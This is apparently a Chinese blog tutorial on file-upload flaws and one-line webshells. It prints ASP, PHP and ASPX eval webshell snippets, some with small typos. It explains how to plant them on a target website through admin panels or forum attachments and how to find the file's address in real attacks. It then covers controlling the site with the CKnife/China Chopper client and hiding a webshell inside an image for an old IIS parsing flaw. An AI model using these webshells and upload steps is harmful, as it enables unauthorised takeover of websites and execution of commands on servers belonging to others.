上传漏洞-一句话木马

声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写!

上传漏洞-一句话木马

讲述内容:

  • 一句话木马 木马使用技巧
  • (中国菜刀、C32、CKnife)

简介:

  • 一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录并可执行一些web账号所有权限的系统命令,进入后渗透阶段。但是发现百度上找到的菜刀都有后门,而且找了很久都没有找到可以用的菜刀,所以推荐两款更好的kali下的工具:webacoo、Weevely 和windows下的工具:CKnife java版本的中国菜刀。


接下来我将演示CKnife java版本的中国菜刀的使用方法,并进行讲解

本程序需要设置 JAVA运行环境

jdk32位 下载 http://www.uzzf.com/soft/395.html

jdk64位 下载 http://www.uzzf.com/soft/77216.html

CKnife java版本菜刀 下载 http://pan.baidu.com/s/1boyQTXH


使用

1.下载菜刀,打开Cknife.jar软件,选择用java打开
上传漏洞-一句话木马_第1张图片
2.在上传一句话漏洞时,我们有两个方法

<1.已经有了网站后台的登录密码以及账号,登录网站后台后上传一句话木马文件>

<2.在一些网站如论坛等等用户可以上传附件>//这种方法成功率不高,很多网站对附件有限制

在这里我用虚拟机搭一个靶机,模拟网站服务器.

靶机IP地址为:192.168.138.131
上传漏洞-一句话木马_第2张图片
3.模拟上传木马文件步骤到服务器

写法——

Asp一句话:<%eval request(“xxx”)%>

Php 一句话:<%php @eval($_POST[xxx]);?>

Aspx一句话:<%@ Page Languag=”xxx”%><%eval(Request.Item[“xxx”])%>

(然后保存为相应的文件格式并上传)//xxx是连接的密码,必须记住,重命名时不能有中文

上传漏洞-一句话木马_第3张图片

4.找到我们上传木马的地址

上传漏洞-一句话木马_第4张图片
如果是在真正的实战中我们怎么得到木马的地址呢??

我们可以在前端找到我们上传的附件,然后右击审查属性,就可以看到附件的地址。也可以在网站后台找到附件存储的位置

上传漏洞-一句话木马_第5张图片
5.打开Cknife.jar软件

右键点击添加,输入上传的php文件地址,php文件密码,脚本类型选择PHP,字符编码GB2312,点击添加

上传漏洞-一句话木马_第6张图片

6.右键文件管理就可以了

上传漏洞-一句话木马_第7张图片

除了文件上传还有图片上传,把一句话漏洞加载到图片里面,通过文件上传的方式上传一句话木马//图片连接性不高,需要iis的解析漏洞,这个漏洞是很久以前的了,所以连接性不高

工具:C32反翻译软件

步骤:打开C32反翻译软件→将图片拖入软件里面(16进制模式)→在右面代码最下端写入一句话代码→另存为(后缀改为图片原本的后缀)

上传漏洞-一句话木马_第8张图片

写代码是热爱,写到世界充满爱!

你可能感兴趣的:(安全开发,逆向漏洞)